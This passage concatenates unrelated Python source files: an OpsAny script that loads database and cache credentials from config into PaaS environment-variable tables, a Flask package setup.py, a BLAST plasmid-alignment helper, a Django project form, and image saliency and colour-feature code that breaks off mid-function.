{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "FILE_ROOT", "value": replace_str(config_dict.get('opsany_saas').get("FILE_ROOT")), "env_scope": "all", "intro": "Salt file root"},
{"key": "PILLAR_ROOT", "value": replace_str(config_dict.get('opsany_saas').get("PILLAR_ROOT")), "env_scope": "all", "intro": "Salt pillar root"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_JOB_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
{"key": "REDIS_HOST", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_IP")), "env_scope": "all", "intro": "redis host"},
{"key": "REDIS_PORT", "value": replace_str(config_dict.get("redis").get("REDIS_PORT")), "env_scope": "all", "intro": "redis port"},
{"key": "REDIS_PASSWORD", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_PASSWORD")), "env_scope": "all", "intro": "redis password"},
# {"key": "DEFAULT_USER_ICON", "value": read_install_config.get("DEFAULT_USER_ICON"), "env_scope": "all", "intro": "user default icon"},
]
},{
"app_code": "workbench",
"env": [
# WORKBENCH count 7
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_WORKBENCH_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_WORKBENCH_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
]
},{
"app_code": "rbac",
"env": [
# RBAC count 4
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_RBAC_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
]
},{
"app_code": "monitor",
"env": [
# MONITOR count 10
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_MONITOR_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_MONITOR_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
{"key": "ELASTIC_SEARCH_USERNAME", "value": replace_str(config_dict.get('elasticsearch').get("ELASTIC_SEARCH_USERNAME")), "env_scope": "all", "intro": "es username"},
{"key": "ES_PASSWORD", "value": replace_str(config_dict.get('elasticsearch').get("ES_PASSWORD")), "env_scope": "all", "intro": "es password"},
{"key": "ES_SERVER_IP", "value": replace_str(config_dict.get('elasticsearch').get("ES_SERVER_IP")), "env_scope": "all", "intro": "es host"},
{"key": "ELASTIC_PORT", "value": replace_str(config_dict.get('elasticsearch').get("ELASTIC_PORT")), "env_scope": "all", "intro": "es port"},
{"key": "ELASTIC_SEARCH_INDEX", "value": replace_str(config_dict.get('elasticsearch').get("ELASTIC_SEARCH_INDEX")), "env_scope": "all", "intro": "es index"},
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
]
},{
"app_code": "control",
"env": [
# CONTROL count 13
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_CONTROL_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_CONTROL_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
{"key": "REDIS_HOST", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_IP")), "env_scope": "all", "intro": "redis host"},
{"key": "REDIS_PORT", "value": replace_str(config_dict.get("redis").get("REDIS_PORT")), "env_scope": "all", "intro": "redis port"},
{"key": "REDIS_PASSWORD", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_PASSWORD")), "env_scope": "all", "intro": "redis password"},
{"key": "ROSTER_FILE_URL", "value": replace_str(config_dict.get('opsany_saas').get("ROSTER_FILE_URL")), "env_scope": "all", "intro": "roster file path"},
{"key": "SALT_SSH_FILE_URL", "value": replace_str(config_dict.get('opsany_saas').get("SALT_SSH_FILE_URL")), "env_scope": "all", "intro": "salt ssh file path"},
{"key": "ANSIBLE_HOST_KEY_CHECKING", "value": replace_str(config_dict.get("opsany_saas").get("ANSIBLE_HOST_KEY_CHECKING")), "env_scope": "all", "intro": "ansible vs host checking"},
# {"key": "DEFAULT_USER_ICON", "value": read_install_config.get("DEFAULT_USER_ICON"), "env_scope": "all", "intro": "user default icon"},
]
},{
"app_code": "devops",
"env": [
# devops count 8
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_DEVOPS_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_DEVOPS_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
# {"key": "DEFAULT_USER_ICON", "value": read_install_config.get("DEFAULT_USER_ICON"), "env_scope": "all", "intro": "user default icon"},
]
},{
"app_code": "bastion",
"env": [
# bastion count 8
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_BASTION_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "REDIS_HOST", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_IP")), "env_scope": "all", "intro": "redis host"},
{"key": "REDIS_PORT", "value": replace_str(config_dict.get("redis").get("REDIS_PORT")), "env_scope": "all", "intro": "redis port"},
{"key": "REDIS_PASSWORD", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_PASSWORD")), "env_scope": "all", "intro": "redis password"},
{"key": "TERMINAL_TIMEOUT", "value": replace_str(config_dict.get("redis").get("TERMINAL_TIMEOUT")), "env_scope": "all", "intro": "terminal timeout"},
]
}
]
class PaasApptag(Base):
__tablename__ = 'paas_apptags'
id = Column(INTEGER(11), primary_key=True)
name = Column(String(20), nullable=False, unique=True)
code = Column(String(30), nullable=False, unique=True)
index = Column(INTEGER(11), nullable=False)
class PaasApp(Base):
__tablename__ = 'paas_app'
id = Column(INTEGER(11), primary_key=True)
name = Column(String(20), nullable=False, unique=True)
code = Column(String(30), nullable=False, unique=True)
introduction = Column(LONGTEXT, nullable=False)
creater = Column(String(20), nullable=False)
created_date = Column(DateTime, index=True)
state = Column(SMALLINT(6), nullable=False)
is_already_test = Column(TINYINT(1), nullable=False)
is_already_online = Column(TINYINT(1), nullable=False)
first_test_time = Column(DateTime, index=True)
first_online_time = Column(DateTime, index=True)
language = Column(String(50))
auth_token = Column(String(36))
tags_id = Column(ForeignKey('paas_apptags.id'), index=True)
deploy_token = Column(LONGTEXT)
is_use_celery = Column(TINYINT(1), nullable=False)
is_use_celery_beat = Column(TINYINT(1), nullable=False)
is_saas = Column(TINYINT(1), nullable=False)
logo = Column(String(100))
tags = relationship('PaasApptag')
class EngineApp(Base):
__tablename__ = 'engine_apps'
id = Column(INTEGER(11), primary_key=True)
name = Column(String(20), nullable=False)
logo = Column(String(100), nullable=False)
app_code = Column(String(100), nullable=False, unique=True)
app_lang = Column(String(100), nullable=False)
app_type = Column(String(100), nullable=False)
is_active = Column(TINYINT(1), nullable=False)
created_at = Column(DateTime, nullable=False)
updated_at = Column(DateTime, nullable=False)
class EngineAppEnv(Base):
__tablename__ = 'engine_app_envs'
id = Column(INTEGER(11), primary_key=True)
mode = Column(String(200), nullable=False)
key = Column(String(200), nullable=False)
value = Column(String(200), nullable=False)
created_at = Column(DateTime, nullable=False)
updated_at = Column(DateTime, nullable=False)
bk_app_id = Column(ForeignKey('engine_apps.id'), nullable=False, index=True)
bk_app = relationship('EngineApp')
class PaasAppEnvvar(Base):
__tablename__ = 'paas_app_envvars'
__table_args__ = (
Index('paas_app_envvars_app_code_36685348c7256adf_uniq', 'app_code', 'mode', 'name', unique=True),
)
id = Column(INTEGER(11), primary_key=True)
app_code = Column(String(30), nullable=False)
mode = Column(String(20), nullable=False)
name = Column(String(50), nullable=False)
value = Column(String(1024), nullable=False)
intro = Column(LONGTEXT)
class AddEnv:
def __init__(self):
cursor = sessionmaker(bind=db)
self.session = cursor()
self.envs = envs
def add_env(self):
for env in self.envs:
app = self.session.query(PaasApp).filter(PaasApp.code==env.get("app_code")).first()
if app:
env_list = env.get("env")
for env_dict in env_list:
key = env_dict.get("key")
value = env_dict.get("value")
env_scope = "prod"
env_query = self.session.query(EngineAppEnv).filter(
EngineAppEnv.bk_app_id==app.id,
EngineAppEnv.key==key
).first()
if not env_query:
create_query = EngineAppEnv(mode=env_scope, key=key, value=value,
created_at=datetime.datetime.now(),
updated_at=datetime.datetime.now(),
bk_app_id=app.id
)
self.session.add(create_query)
self.session.commit()
print("For {} create env info: key={} value={}".format(env.get("app_code"), key, value))
else:
self.session.query(EngineAppEnv).filter(
EngineAppEnv.id==env_query.id).update({
"mode": env_scope,
"key": key,
"value": value,
"updated_at": datetime.datetime.now(),
"bk_app_id": app.id
})
self.session.commit()
print("For {} update env info: key={} value={}".format(env.get("app_code"), key, value))
def add_env_v2(self):
for env in self.envs:
app_code = env.get("app_code")
env_list = env.get("env")
for env_dict in env_list:
env_query = self.session.query(PaasAppEnvvar).filter(
PaasAppEnvvar.app_code==app_code,
PaasAppEnvvar.name==env_dict.get("key")
).first()
if not env_query:
create_query = PaasAppEnvvar(app_code=app_code,
name=env_dict.get("key", ""),
value=env_dict.get("value", ""),
mode=env_dict.get("env_scope", "all"),
intro=env_dict.get("intro", ""),
)
self.session.add(create_query)
self.session.commit()
print("For {} create env info: key={} value={}".format(app_code, env_dict.get("key"),
env_dict.get("value")))
else:
self.session.query(PaasAppEnvvar).filter(
PaasAppEnvvar.id==env_query.id).update({
"mode": env_dict.get("env_scope", "all"),
"name": env_dict.get("key", ""),
"value": env_dict.get("value", ""),
"intro": env_dict.get("intro", ""),
"app_code": app_code,
})
self.session.commit()
print("For {} update env info: key={} value={}".format(app_code, env_dict.get("key"),
env_dict.get("value")))
if __name__ == '__main__':
AddEnv().add_env_v2()
print("ENV INPUT IS DONE, SUCCESS.")
|
import setuptools
setuptools.setup(
name="Flask-API-Framework",
version="0.0.3",
keywords="flask api framework",
description="Flask API Framework",
long_description="Please see the project links.",
project_urls={
"Documentation": "https://flask-api-framework.readthedocs.io/",
"Source": "https://github.com/thnee/flask-api-framework",
},
license="BSD-3-Clause",
author="Mattias Lindvall",
author_email="mattias.lindvall@gmail.com",
package_dir={"": "src"},
packages=["flask_api_framework"],
python_requires=">=3.7",
install_requires=[
"flask >= 2.0.0",
"marshmallow >= 3.14.0",
],
extras_require={
"test": [
"flask-sqlalchemy ~= 2.5.1",
"marshmallow-sqlalchemy ~= 0.28.0",
"flask-marshmallow ~= 0.14.0",
"pytest ~= 7.1.2",
"pytest-cov ~= 3.0.0",
"flake8 ~= 4.0.1",
"flake8-print ~= 5.0.0",
"flake8-bugbear ~= 22.4.25",
"black ~= 22.3.0",
"isort ~= 5.10.1",
"invoke ~= 1.7.1",
"tox ~= 3.25.0",
],
"build": [
"wheel ~= 0.37.1",
"twine ~= 4.0.0",
],
},
classifiers=[
# "Development Status :: 1 - Planning",
# "Development Status :: 2 - Pre-Alpha",
"Development Status :: 3 - Alpha",
# "Development Status :: 4 - Beta",
# "Development Status :: 5 - Production/Stable",
# "Development Status :: 6 - Mature",
# "Development Status :: 7 - Inactive",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Software Development",
"Intended Audience :: Developers",
"Framework :: Flask",
],
)
|
import json
import xmltodict
import subprocess
import random
import string
import os
import os.path
import sys
class BlastPlasmid:
def __init__(self, plasmidSeq):
self.plasmidSeq = plasmidSeq
randomFileName = ''.join(random.choice(string.ascii_uppercase+string.digits) for _ in range(10))+".tmp"
self.fileName = randomFileName
self.result = None
self.filePath = os.path.join("tmp",randomFileName)
with open(self.filePath, "w") as f:
f.write('>seq1\n')
f.write(plasmidSeq)
f.write("\n")
def blast6(self, abiSeq):
randomFileName = os.path.join("tmp", ''.join(random.choice(string.ascii_uppercase+string.digits) for _ in range(10))+".tmp")
with open(randomFileName, "w") as f:
f.write('>seq2\n')
f.write(abiSeq)
f.write("\n")
process = subprocess.Popen(('blastn -subject {} -query {} -outfmt 6'.format(self.filePath, randomFileName)).split(' '), stdout=subprocess.PIPE, universal_newlines=True)
# out = process.communicate(input=abiSeq)[0]
out = process.communicate()[0]
#debug save xml
if out == '':
return {}
        # outfmt 6 output is tab-delimited; split on any whitespace so the
        # field indexes below pick out the first (best) hit correctly
        data = out.split()
        self.result = {'subFrom': data[8], 'subTo': data[9], 'queryFrom': data[6], 'queryTo': data[7]}
#sys.stderr.write(json.dumps(self.result))
#subprocess.call(['rm',self.filePath])
return self.result
def hasHits(self,dct):
return dct['BlastOutput']['BlastOutput_iterations']['Iteration']['Iteration_hits']!=None
def getHsp(self, dct):
hsp = dct['BlastOutput']['BlastOutput_iterations']['Iteration']['Iteration_hits']['Hit']['Hit_hsps']['Hsp']
return hsp
def getMatch(self, dct):
hits = dct['BlastOutput']['BlastOutput_iterations']['Iteration']['Iteration_hits']['Hit']
#length = hits['Hit_len']
hsp = hits['Hit_hsps']['Hsp']
if type(hsp) == list:
hsp = hsp[0]
qseq = hsp['Hsp_qseq']
midline = hsp['Hsp_midline']
hseq = hsp['Hsp_hseq']
return {"qseq":qseq,"midline":midline,"hseq":hseq}
def getOutput(self,dct):
if self.hasHits(dct):
hsp = self.getHsp(dct)
if type(hsp)==list:
hsp = hsp[0]
queryFrom = int(hsp['Hsp_query-from'])
queryTo = int(hsp['Hsp_query-to'])
hitFrom = int(hsp['Hsp_hit-from'])
hitTo = int(hsp['Hsp_hit-to'])
else:
queryFrom = int(hsp['Hsp_query-from'])
queryTo = int(hsp['Hsp_query-to'])
hitFrom = int(hsp['Hsp_hit-from'])
hitTo = int(hsp['Hsp_hit-to'])
return {"queryFrom":queryFrom,"queryTo":queryTo,"hitFrom":hitFrom,"hitTo":hitTo,"match":self.getMatch(dct),"message":"OK"}
else:
return {"message":"no hits"}
def reverseComplement(src):
dst = ""
d = {"A":"T","T":"A","C":"G","G":"C","c":'g','g':'c','a':'t','t':'a'}
for i in range(len(src)-1,-1,-1):
if src[i] in d:
dst+=d[src[i]]
else:
dst+=" "
return dst
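# Example (illustrative): reverseComplement("ATGC") returns "GCAT"; any
# character missing from the lookup table (e.g. "N") becomes a space.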
def fullAlignment(original,abiSeq,plasmidSeq):
abiSeq = abiSeq.replace("\n","")
plasmidSeq = plasmidSeq.replace("\n","")
if 'queryFrom' in original and 'queryTo' in original:
if original['queryFrom'] ==1 and original['queryTo']==len(plasmidSeq):
return original
else:
oriQFrom = original['queryFrom']-1
oriQTo = original['queryTo']
oriHFrom = original['hitFrom']-1
oriHTo = original['hitTo']
add5 = plasmidSeq[:oriQFrom]
add3 = plasmidSeq[oriQTo:]
hitFrom = 0
hitTo = len(plasmidSeq)
qseq = add5+original['match']['qseq']+add3
if oriQFrom < oriQTo:
queryFrom = oriQFrom - len(add5)
queryTo = oriQTo + len(add3)
hseq = abiSeq[queryFrom:oriQFrom] + original['match']['hseq'] +abiSeq[oriQTo:queryTo]
else:
                queryFrom = oriQFrom + len(add5)
                queryTo = oriQTo - len(add3)
                rcAbiSeq = reverseComplement(abiSeq)
                rcLen = len(rcAbiSeq)
                hseq = rcAbiSeq[rcLen-queryFrom:rcLen-original['queryFrom']] + original['match']['hseq'] + rcAbiSeq[rcLen-original['queryTo']:rcLen-queryTo]
match = ""
#print oriQFrom
#print oriQTo
#print oriHFrom
#print oriHTo
#print add5,len(add5)
#print add3,len(add3)
#print queryFrom
#print queryTo
#print original['queryFrom']
#print original['queryTo']
#
for i in range(len(qseq)):
if qseq[i] == hseq[i]:
match+="|"
else:
match+=" "
return {"queryFrom":oriQFrom+1,"queryTo":oriQTo,"hitFrom":oriHFrom+1,"hitTo":oriHTo,"match":{"qseq":qseq,"midline":match,"hseq":hseq},"message":"OK"}
else:
return original
# if __name__ == "__main__":
# fullAlignmentFlag = False
# if len(sys.argv)>1:
# if sys.argv[1] == '-a':
# fullAlignmentFlag = True
# seq = sys.stdin.readline() #abi
# seq2 = sys.stdin.readline() #original
# b = BlastPlasmid(seq)
# dct = b.blast(seq2)
# output = b.getOutput(dct)
# if fullAlignmentFlag:
# output = fullAlignment(output,seq,seq2)
# sys.stdout.write(json.dumps(output))
# else:
# print __name__
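# A hedged usage sketch for the current API: the commented-out __main__ above
# still calls a ``blast`` method that is not defined in this file, whereas
# ``blast6`` is what exists now. Requires the ``blastn`` binary on PATH and a
# writable ``tmp/`` directory.
#
#     b = BlastPlasmid(plasmid_sequence)
#     hit = b.blast6(abi_sequence)   # returns {} when blastn reports no hit
#     print(json.dumps(hit))         # subFrom / subTo / queryFrom / queryTo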
|
from django.forms import ModelForm
from ..models import Project
class ProjectForm(ModelForm):
class Meta:
model = Project
fields = ('title','body','parent',)
    def __init__(self, *args, **kwargs):
        '''Uses the passed request to filter the choices for parent projects.
        (A hedged sketch of how a view can pass ``request`` is at the end of
        this file.)'''
        # Pop ``request`` before calling the parent constructor so ModelForm
        # never receives an unexpected keyword argument, and so a missing
        # ``request`` no longer raises KeyError.
        self.request = kwargs.pop('request', None)
        super(ProjectForm, self).__init__(*args, **kwargs)
        if self.request is not None:
            # Only top-level projects can be choices
            query_set = Project.objects.filter(user=self.request.user,
                                               parent=None)
            # Exclude self instance from choices on UpdateView
            if self.instance.pk is not None:
                query_set = query_set.exclude(pk=self.instance.pk)
            self.fields['parent'].queryset = query_set
self.fields['title'].widget.attrs.update({'class': 'form-control border border-dark',
'placeholder': 'Title',
'id': 'projectTitle',})
self.fields['body'].widget.attrs.update({'class': 'form-control border border-dark',
'placeholder': 'Body',
'id': 'projectBody',
'style': 'height: 8rem;',})
self.fields['parent'].widget.attrs.update({'class': 'form-select border border-dark',
'placeholder': 'Parent',
'id': 'projectParent',})
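# A hedged sketch (not part of this app's actual views) of how a view can
# supply the ``request`` keyword consumed by ProjectForm.__init__, e.g. from
# a class-based view's get_form_kwargs:
#
#     class ProjectCreateView(CreateView):
#         form_class = ProjectForm
#
#         def get_form_kwargs(self):
#             kwargs = super().get_form_kwargs()
#             kwargs['request'] = self.request
#             return kwargs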
|
import multiprocessing
import operator
import os
from collections import defaultdict
from functools import partial
import cv2
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from PIL import Image
from skimage import feature
from sklearn.metrics.pairwise import euclidean_distances
from .base import BaseFeatureTransformer
class Saliency:
"""Generate saliency map from RGB images with the spectral residual method
This class implements an algorithm that is based on the spectral
residual approach (Hou & Zhang, 2007).
"""
def __init__(self, img, use_numpy_fft=True, gauss_kernel=(5, 5)):
"""Constructor
This method initializes the saliency algorithm.
:param img: an RGB input image
:param use_numpy_fft: flag whether to use NumPy's FFT (True) or
OpenCV's FFT (False)
:param gauss_kernel: Kernel size for Gaussian blur
"""
self.use_numpy_fft = use_numpy_fft
self.gauss_kernel = gauss_kernel
self.frame_orig = img
# downsample image for processing
self.small_shape = (64, 64)
self.frame_small = cv2.resize(img, self.small_shape[1::-1])
# whether we need to do the math (True) or it has already
# been done (False)
self.need_saliency_map = True
def get_saliency_map(self):
"""Returns a saliency map
This method generates a saliency map for the image that was
passed to the class constructor.
:returns: grayscale saliency map
"""
if self.need_saliency_map:
# haven't calculated saliency map for this image yet
if len(self.frame_orig.shape) == 2:
# single channel
sal = self._get_channel_sal_magn(self.frame_small)
else:
# multiple channels: consider each channel independently
sal = np.zeros_like(self.frame_small).astype(np.float32)
for c in range(self.frame_small.shape[2]):
small = self.frame_small[:, :, c]
sal[:, :, c] = self._get_channel_sal_magn(small)
# overall saliency: channel mean
sal = np.mean(sal, 2)
# postprocess: blur, square, and normalize
if self.gauss_kernel is not None:
sal = cv2.GaussianBlur(sal, self.gauss_kernel, sigmaX=8, sigmaY=0)
sal = sal ** 2
sal = np.float32(sal) / np.max(sal)
# scale up
sal = cv2.resize(sal, self.frame_orig.shape[1::-1])
# store a copy so we do the work only once per frame
self.saliencyMap = sal
self.need_saliency_map = False
return self.saliencyMap
def _get_channel_sal_magn(self, channel):
"""Returns the log-magnitude of the Fourier spectrum
This method calculates the log-magnitude of the Fourier spectrum
of a single-channel image. This image could be a regular grayscale
image, or a single color channel of an RGB image.
:param channel: single-channel input image
:returns: log-magnitude of Fourier spectrum
"""
# do FFT and get log-spectrum
if self.use_numpy_fft:
img_dft = np.fft.fft2(channel)
magnitude, angle = cv2.cartToPolar(np.real(img_dft), np.imag(img_dft))
else:
img_dft = cv2.dft(np.float32(channel), flags=cv2.DFT_COMPLEX_OUTPUT)
magnitude, angle = cv2.cartToPolar(img_dft[:, :, 0], img_dft[:, :, 1])
# get log amplitude
log_ampl = np.log10(magnitude.clip(min=1e-9))
# blur log amplitude with avg filter
log_ampl_blur = cv2.blur(log_ampl, (3, 3))
# residual
residual = np.exp(log_ampl - log_ampl_blur)
# back to cartesian frequency domain
if self.use_numpy_fft:
real_part, imag_part = cv2.polarToCart(residual, angle)
img_combined = np.fft.ifft2(real_part + 1j * imag_part)
magnitude, _ = cv2.cartToPolar(np.real(img_combined), np.imag(img_combined))
else:
img_dft[:, :, 0], img_dft[:, :, 1] = cv2.polarToCart(residual, angle)
img_combined = cv2.idft(img_dft)
magnitude, _ = cv2.cartToPolar(img_combined[:, :, 0], img_combined[:, :, 1])
return magnitude
def calc_magnitude_spectrum(self):
"""Plots the magnitude spectrum
This method calculates the magnitude spectrum of the image passed
to the class constructor.
:returns: magnitude spectrum
"""
# convert the frame to grayscale if necessary
if len(self.frame_orig.shape) > 2:
frame = cv2.cvtColor(self.frame_orig, cv2.COLOR_BGR2GRAY)
else:
frame = self.frame_orig
# expand the image to an optimal size for FFT
rows, cols = self.frame_orig.shape[:2]
nrows = cv2.getOptimalDFTSize(rows)
ncols = cv2.getOptimalDFTSize(cols)
        # pad bottom and right so the frame becomes nrows x ncols
        frame = cv2.copyMakeBorder(
            frame, 0, nrows - rows, 0, ncols - cols, cv2.BORDER_CONSTANT, value=0
        )
# do FFT and get log-spectrum
img_dft = np.fft.fft2(frame)
spectrum = np.log10(np.abs(np.fft.fftshift(img_dft)))
# return for plotting
return 255 * spectrum / np.max(spectrum)
def plot_power_spectrum(self):
"""Plots the power spectrum
This method plots the power spectrum of the image passed to
the class constructor.
:returns: power spectrum
"""
# convert the frame to grayscale if necessary
if len(self.frame_orig.shape) > 2:
frame = cv2.cvtColor(self.frame_orig, cv2.COLOR_BGR2GRAY)
else:
frame = self.frame_orig
# expand the image to an optimal size for FFT
rows, cols = self.frame_orig.shape[:2]
nrows = cv2.getOptimalDFTSize(rows)
ncols = cv2.getOptimalDFTSize(cols)
        # pad bottom and right so the frame becomes nrows x ncols
        frame = cv2.copyMakeBorder(
            frame, 0, nrows - rows, 0, ncols - cols, cv2.BORDER_CONSTANT, value=0
        )
# do FFT and get log-spectrum
if self.use_numpy_fft:
img_dft = np.fft.fft2(frame)
spectrum = np.log10(np.real(np.abs(img_dft)) ** 2)
else:
img_dft = cv2.dft(np.float32(frame), flags=cv2.DFT_COMPLEX_OUTPUT)
spectrum = np.log10(img_dft[:, :, 0] ** 2 + img_dft[:, :, 1] ** 2)
# radial average
L = max(frame.shape)
        freqs = np.fft.fftfreq(L)[: L // 2]
dists = np.sqrt(
np.fft.fftfreq(frame.shape[0])[:, np.newaxis] ** 2
+ np.fft.fftfreq(frame.shape[1]) ** 2
)
dcount = np.histogram(dists.ravel(), bins=freqs)[0]
histo, bins = np.histogram(dists.ravel(), bins=freqs, weights=spectrum.ravel())
centers = (bins[:-1] + bins[1:]) / 2
plt.plot(centers, histo / dcount)
plt.xlabel("frequency")
plt.ylabel("log-spectrum")
plt.show()
def get_proto_objects_map(self, use_otsu=True):
"""Returns the proto-objects map of an RGB image
This method generates a proto-objects map of an RGB image.
Proto-objects are saliency hot spots, generated by thresholding
the saliency map.
:param use_otsu: flag whether to use Otsu thresholding (True) or
a hardcoded threshold value (False)
:returns: proto-objects map
"""
saliency = self.get_saliency_map()
if use_otsu:
_, img_objects = cv2.threshold(
np.uint8(saliency * 255), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU
)
else:
thresh = np.mean(saliency) * 255 * 3
_, img_objects = cv2.threshold(
np.uint8(saliency * 255), thresh, 255, cv2.THRESH_BINARY
)
return img_objects
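# Usage sketch (illustrative only): the Saliency class implements the spectral
# residual method, where saliency comes from the difference between the
# log-amplitude spectrum and its local average. "photo.jpg" below is an
# assumed input file:
#
# img = cv2.imread("photo.jpg")
# sal = Saliency(img, use_numpy_fft=True)
# saliency_map = sal.get_saliency_map()        # float32 map normalized to [0, 1]
# proto_objects = sal.get_proto_objects_map()  # thresholded map of salient blobs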
def get_dullness(img):
img = Image.fromarray(img)
# obtain the color palette of the image
palette = defaultdict(int)
for pixel in img.getdata():
palette[pixel] += 1
# sort the colors present in the image
sorted_x = sorted(palette.items(), key=operator.itemgetter(1), reverse=True)
light_shade, dark_shade, shade_count, pixel_limit = 0, 0, 0, 25
for i, x in enumerate(sorted_x[:pixel_limit]):
if all(xx <= 20 for xx in x[0][:3]): # dull : too much darkness
dark_shade += x[1]
if all(xx >= 240 for xx in x[0][:3]): # bright : too much whiteness
light_shade += x[1]
shade_count += x[1]
light_percent = light_shade / shade_count
dark_percent = dark_shade / shade_count
return {"light_percent": light_percent, "dark_percent": dark_percent}
def get_average_pixel_width(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
edges_sigma1 = feature.canny(gray, sigma=3)
apw = np.sum(edges_sigma1) / img.shape[0] / img.shape[1]
return {"average_pixel_width": apw}
def get_dominant_color(img):
pixels = img.reshape(-1, 3).astype("float32")
n_colors = 5
